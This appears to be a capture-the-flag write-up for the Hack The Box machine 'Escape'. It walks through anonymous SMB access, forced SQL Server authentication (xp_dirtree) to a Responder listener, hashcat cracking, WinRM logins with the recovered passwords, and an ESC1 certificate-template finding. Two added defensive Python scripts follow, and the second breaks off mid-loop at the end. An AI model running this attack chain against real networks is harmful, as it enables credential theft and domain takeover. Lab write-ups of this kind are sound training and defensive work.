HTB - Escape Write-up

TL;DR

We start by finding guest SQL credentials in a PDF on an anonymously readable share. From the SQL server we can immediately coerce an authentication back to our SMB listener (an SMB relay-style attack) and capture the service account's NetNTLMv2 hash. After cracking the hash we log in over WinRM. A backed-up SQL Server log leaks another user's password, and we log in as that user. A misconfigured ADCS certificate template that this user can enroll in lets us obtain a certificate for the Administrator account, and we escalate our privileges to root the machine.

Enumeration

🔥\> nmap -p- -sC -sV -v -oA enum --min-rate 3000 --max-rtt-timeout 1300ms 10.129.65.160
Nmap scan report for 10.129.65.160
Host is up (0.19s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-02-28 12:52:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-28T12:54:18+00:00; +7h59m58s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-28T04:20:45
| Not valid after:  2053-02-28T04:20:45
| MD5:   38cf7d7fd80c5c92ee9e8417f725cc0d
|_SHA-1: eef3b0caa0f4b28534a7f3d84f11eeb400f4f7eb
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:17+00:00; +7h59m58s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after:  2023-11-18T21:20:35
| MD5:   869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-28T12:54:18+00:00; +7h59m58s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
50610/tcp open  msrpc         Microsoft Windows RPC
65398/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-02-28T12:53:39
|_  start_date: N/A
|_clock-skew: mean: 7h59m57s, deviation: 0s, median: 7h59m57s

Add the domain name (sequel.htb) to the hosts file. SMB is open, so let’s try an anonymous login.

🔥\> smbclient -L //sequel.htb -U ''
Password for [WORKGROUP\]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Public          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to sequel.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Anonymous login works. Let’s check the ‘Public’ share.

🔥\> smbclient //sequel.htb/Public -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1469523 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (111.8 KiloBytes/sec) (average 111.8 KiloBytes/sec)

Download the PDF file and inspect its contents.

[Screenshots of the PDF’s contents]

The document describes recent incidents on their SQL server, and in response they have written a procedure on how to access it. This procedure leaks potential usernames and the guest password used to access the SQL server.

Let’s log in to the SQL server using those credentials.

🔥\> sqsh -S sequel.htb:1433 -P 'GuestUserCantWrite1' -U PublicUser
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'

1> SELECT name FROM master.dbo.sysdatabases
2> go -m pretty
+===========================================================================================================================================================================+
| name                                                                                                                                                                      |
+===========================================================================================================================================================================+
| master                                                                                                                                                                    |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| tempdb                                                                                                                                                                    |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| model                                                                                                                                                                     |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| msdb                                                                                                                                                                      |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(4 rows affected)

Let’s do some basic enumeration.

1> select @@version;
2> go -m pretty
+===========================================================================================================================================================================+
|                                                                                                                                                                           |
+===========================================================================================================================================================================+
| Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)                                                                                                                       |
|       Sep 24 2019 13:48:23                                                                                                                                                     |
|       Copyright (C) 2019 Microsoft Corporation                                                                                                                                 |
|       Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)                                                                         |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(1 row affected)
1> select user_name();
2> go -m pretty
+===========================================================================================================================================================================+
|                                                                                                                                                                           |
+===========================================================================================================================================================================+
| guest                                                                                                                                                                     |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

(1 row affected)
1> SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
2> go -m pretty
+==================+==================================+==================================+==================================+==================================+==================================+==================================+============+=============+
| configuration_id | name                             | value                            | minimum                          | maximum                          | value_in_use                     | description                      | is_dynamic | is_advanced |
+==================+==================================+==================================+==================================+==================================+==================================+==================================+============+=============+
|            16390 | xp_cmdshell                      | 0                                | 0                                | 1                                | 0                                | Enable or disable command shell  |          1 |           1 |
+------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+----------------------------------+------------+-------------+

(1 row affected)

1> EXEC SP_CONFIGURE 'show advanced options', 1
2> reconfigure
3> go
Msg 15247, Level 16, State 1
Server 'DC\SQLMOCK', Procedure 'SP_CONFIGURE', Line 105
User does not have permission to perform this action.
(return status = 1)
Msg 5812, Level 14, State 1
Server 'DC\SQLMOCK', Line 2
You do not have permission to run the RECONFIGURE statement.

As this is a guest account, xp_cmdshell is disabled and we don't have permission to enable it.

Initial Access

Let’s perform what is loosely called an SMB relay attack using MSSQL: we make the SQL server authenticate to an SMB server we control and capture the service account's NetNTLMv2 hash (nmap reported SMB signing as required on the DC, so we crack the captured hash rather than relay it). For this we need an SMB listener; fortunately Responder sets one up for us.

🔥\> sudo responder -I tun0

Now, from the SQL shell, we make the server connect back to our SMB listener with xp_dirtree.

1> xp_dirtree '\\10.10.14.28\NTLM'
2> go -m pretty
+=============================================================================================================================================================+=============+
| subdirectory                                                                                                                                                |       depth |
+=============================================================================================================================================================+=============+

(0 rows affected, return status = 0)

Check Responder's output.

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a61113c68dc12de[SNIP]

We got the NetNTLMv2 hash. We can crack it with hashcat.

Save the hash to a file.

🔥\> cat sql_svc.hash
sql_svc::sequel:50eaf3aecb06d[SNIP]

Crack the hash.

🔥\> hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt

______________SNIP_________________

SQL_SVC::sequel:50eaf3aecb06d284:adaa013773730d4eeb29b41cf7e17f34:[SNIP]:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:50eaf3aecb06d284:adaa013773730d4eeb...000000
Time.Started.....: Sun Mar  5 02:20:53 2023 (10 secs)
Time.Estimated...: Sun Mar  5 02:21:03 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1101.9 kH/s (0.45ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700800/14344385 (74.60%)
Rejected.........: 0/10700800 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REDOCEAN22
Hardware.Mon.#1..: Util: 61%

Started: Sun Mar  5 02:20:51 2023
Stopped: Sun Mar  5 02:21:05 2023

We got the password. Let’s log in over WinRM.

🔥\> evil-winrm -i sequel.htb -u sql_svc -p 'REGGIE1234ronnie'

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Privilege Escalation - User

*Evil-WinRM* PS C:\Users\sql_svc\Documents> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Brandon.Brown            Guest
James.Roberts            krbtgt                   Nicole.Thompson
Ryan.Cooper              sql_svc                  Tom.Henn
The command completed with one or more errors.

I ran WinPEAS; it didn’t give any info that could be used to escalate privileges, but it shows certificates are being used.

╔══════════╣ Enumerating machine and user certificate files

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            :
  ValidDate          : 11/18/2022 1:05:34 PM
  ExpiryDate         : 11/18/2023 1:05:34 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : B3954D2D39DCEF1A673D6AEB9DE9116891CE57B2

  Template           : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.15399414.11998038.16730805.7332313.6448437.247.1.33), Major Version Number=110, Minor Version Number=0
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
       Smart Card Logon
       KDC Authentication
   =================================================================================================

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            : CN=sequel-DC-CA, DC=sequel, DC=htb
  ValidDate          : 11/18/2022 12:58:46 PM
  ExpiryDate         : 11/18/2121 1:08:46 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : A263EA89CAFE503BB33513E359747FD262F91A56

   =================================================================================================

  Issuer             : CN=sequel-DC-CA, DC=sequel, DC=htb
  Subject            : CN=dc.sequel.htb
  ValidDate          : 11/18/2022 1:20:35 PM
  ExpiryDate         : 11/18/2023 1:20:35 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : 742AB4522191331767395039DB9B3B2E27B6F7FA

  Template           : DomainController
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
   =================================================================================================

Let’s look for vulnerable certificate templates. Upload the Certify.exe binary and run its find action.

*Evil-WinRM* PS C:\Users\sql_svc\Documents> ./certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[+] No Vulnerable Certificates Templates found!

As you can see, no vulnerable certificate templates are found for the current user.

Check the C: drive.

*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows

There’s a SQLServer directory on the system drive. Inside its logs folder you will see a backed-up error log.

*Evil-WinRM* PS C:\sqlserver\logs> ls


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Read it and look for anything useful.

*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK

---------------------- SNIP ------------------

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

There are two consecutive login failures: the first for 'sequel.htb\Ryan.Cooper' and, a fraction of a second later, one for a "user" named 'NuclearMosquito3'. Ryan has mistakenly typed his password into the username field, so the log gives us his password.
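
The same mistake is easy to hunt for on the defensive side. The script below is an added example (my code, not from the write-up): it scans SQL Server ERRORLOG lines for logon failures whose "user" is not a known account and which closely follow a known account's failure from the same client, the signature of a password typed into the username field. The sample log and the known-account list are constructed from the lines shown above (the net user output, the PublicUser SQL login from the PDF, and an added ordinary sql_svc failure); the 30-second window is my assumption. The report deliberately prints only the length of the suspicious value so that the detection does not re-leak the password.

```python
import re
from datetime import datetime, timedelta

# Constructed sample, modelled on the ERRORLOG.BAK excerpt in the write-up.
# The Ryan.Cooper / NuclearMosquito3 pair is the pattern seen in the log; the
# sql_svc line is an added, ordinary failure that must not be flagged.
ERRORLOG = r"""
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:10.02 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:45:10.02 Logon       Logon failed for user 'sequel.htb\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
"""

# Known principals: the domain users listed by "net user /domain" in the
# write-up plus the PublicUser SQL login from the PDF (lower-cased).
KNOWN_ACCOUNTS = {
    "administrator", "brandon.brown", "guest", "james.roberts", "krbtgt",
    "nicole.thompson", "ryan.cooper", "sql_svc", "tom.henn", "publicuser",
}

# One ERRORLOG "Logon failed for user" line: timestamp, quoted login, client.
FAILURE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) Logon\s+"
    r"Logon failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(log_text):
    """Return (timestamp, user, client) tuples for every failed-logon line."""
    failures = []
    for line in log_text.splitlines():
        m = FAILURE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            failures.append((ts, m["user"], m["client"]))
    return failures


def short_name(user):
    """'sequel.htb\\Ryan.Cooper' -> 'ryan.cooper'; a bare login is returned lower-cased."""
    return user.rsplit("\\", 1)[-1].lower()


def redact(value):
    """Never echo the suspicious value: a leaked password must not be logged again."""
    return f"<{len(value)} chars>"


def find_password_in_username(log_text, known=KNOWN_ACCOUNTS, window=timedelta(seconds=30)):
    """Flag failures whose 'user' is not a known account and that closely follow a
    known account's failure from the same client (password typed as the username)."""
    failures = parse_failures(log_text)
    findings = []
    for i, (ts, user, client) in enumerate(failures):
        if short_name(user) in known:
            continue  # ordinary failed logon for a real account
        prior = [u for (t, u, c) in failures[:i]
                 if c == client and ts - t <= window and short_name(u) in known]
        findings.append({
            "time": ts.isoformat(sep=" "),
            "client": client,
            "value": redact(user),
            "likely_owner": prior[-1] if prior else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_password_in_username(ERRORLOG):
        print(f"{f['time']} client={f['client']} unknown login {f['value']} right after a "
              f"failure for {f['likely_owner']}: possible password in the username field")
```

Run against a real ERRORLOG the known-account list would come from the directory and from sys.server_principals rather than a hard-coded set; the point of the example is the correlation (unknown login, same client, seconds after a real user's failure) and that the finding never carries the secret itself.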

Let’s log in as Ryan.

🔥\> evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'

Evil-WinRM shell v3.4

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Privilege Escalation - Admin

When we previously checked for vulnerable certificate templates as sql_svc there were none. Let’s check again as Ryan.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.3621056

As you can see, the UserAuthentication template is vulnerable: its msPKI-Certificates-Name-Flag is ENROLLEE_SUPPLIES_SUBJECT (the requester chooses the subject and subject alternative name), its EKUs include Client Authentication, no authorized signatures or manager approval are required, and sequel\Domain Users has enrollment rights. That combination (commonly called ESC1) lets any domain user request a certificate that authenticates as Administrator, so it can be abused for privilege escalation.
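
To make that judgement repeatable, here is an added example (my code, not Certify's and not part of the write-up) that parses the text format of Certify's find output shown above and checks each template for the ESC1 conditions: ENROLLEE_SUPPLIES_SUBJECT, an authentication-capable EKU, no manager approval (PEND_ALL_REQUESTS), zero authorized signatures, and enrollment rights for a low-privileged group. The sample input reproduces the UserAuthentication template from the output above and adds a constructed, hardened variant (UserAuthenticationFixed, an assumed name) to show which settings make the template safe.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the text format of Certify's "find /vulnerable" output.
# The first template copies the UserAuthentication settings from the write-up;
# the second (UserAuthenticationFixed) is a made-up hardened variant.
CERTIFY_OUTPUT = r"""
[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthenticationFixed
    Schema Version                        : 2
    msPKI-Certificates-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, PEND_ALL_REQUESTS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
"""

KV_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 _-]*?)\s*:\s*(.*)$")   # "Key : value"
PRINCIPAL_RE = re.compile(r"^\s*(\S.*?)\s{2,}(S-1-[\d-]+)\s*$")      # "DOMAIN\Group   SID"
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone", "Users"}
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}
ESC1_CONDITION_COUNT = 5


@dataclass
class Template:
    ca: str = ""
    name: str = ""
    fields: dict = field(default_factory=dict)
    enrollers: list = field(default_factory=list)   # principals with Enrollment Rights


def parse_certify(text):
    """Split Certify's template listing into Template objects; each 'CA Name' line starts one."""
    templates, current, last_key = [], None, None
    for line in text.splitlines():
        m = KV_RE.match(line)
        if m:
            key, value = m.group(1), m.group(2).strip()
            if key == "CA Name":
                current = Template(ca=value)
                templates.append(current)
            if current is None:
                continue
            if key == "Template Name":
                current.name = value
            elif key == "Enrollment Rights":
                pm = PRINCIPAL_RE.match(value)
                current.enrollers.append(pm.group(1) if pm else value)
            else:
                current.fields[key] = value
            last_key = key
            continue
        pm = PRINCIPAL_RE.match(line)   # continuation line: another principal, no "Key :"
        if pm and current is not None and last_key == "Enrollment Rights":
            current.enrollers.append(pm.group(1))
    return templates


def esc1_findings(t):
    """Return the ESC1 preconditions that hold for the template, as readable strings."""
    f = t.fields
    ekus = {e.strip() for e in f.get("pkiextendedkeyusage", "").split(",") if e.strip()}
    weak = [p for p in t.enrollers if p.split("\\", 1)[-1] in LOW_PRIV_GROUPS]
    checks = [
        ("requester controls the subject/SAN (ENROLLEE_SUPPLIES_SUBJECT)",
         "ENROLLEE_SUPPLIES_SUBJECT" in f.get("msPKI-Certificates-Name-Flag", "")),
        ("certificate is usable for domain authentication (EKU: %s)" % (", ".join(sorted(ekus)) or "any"),
         not ekus or bool(ekus & AUTH_EKUS)),
        ("no manager approval required (PEND_ALL_REQUESTS not set)",
         "PEND_ALL_REQUESTS" not in f.get("mspki-enrollment-flag", "")),
        ("no authorized signatures required",
         f.get("Authorized Signatures Required", "").strip() == "0"),
        ("low-privileged principals can enroll: " + ", ".join(weak), bool(weak)),
    ]
    return [desc for desc, hit in checks if hit]


def is_esc1(t):
    """ESC1 needs every precondition at once; removing any one of them closes it."""
    return len(esc1_findings(t)) == ESC1_CONDITION_COUNT


if __name__ == "__main__":
    for t in parse_certify(CERTIFY_OUTPUT):
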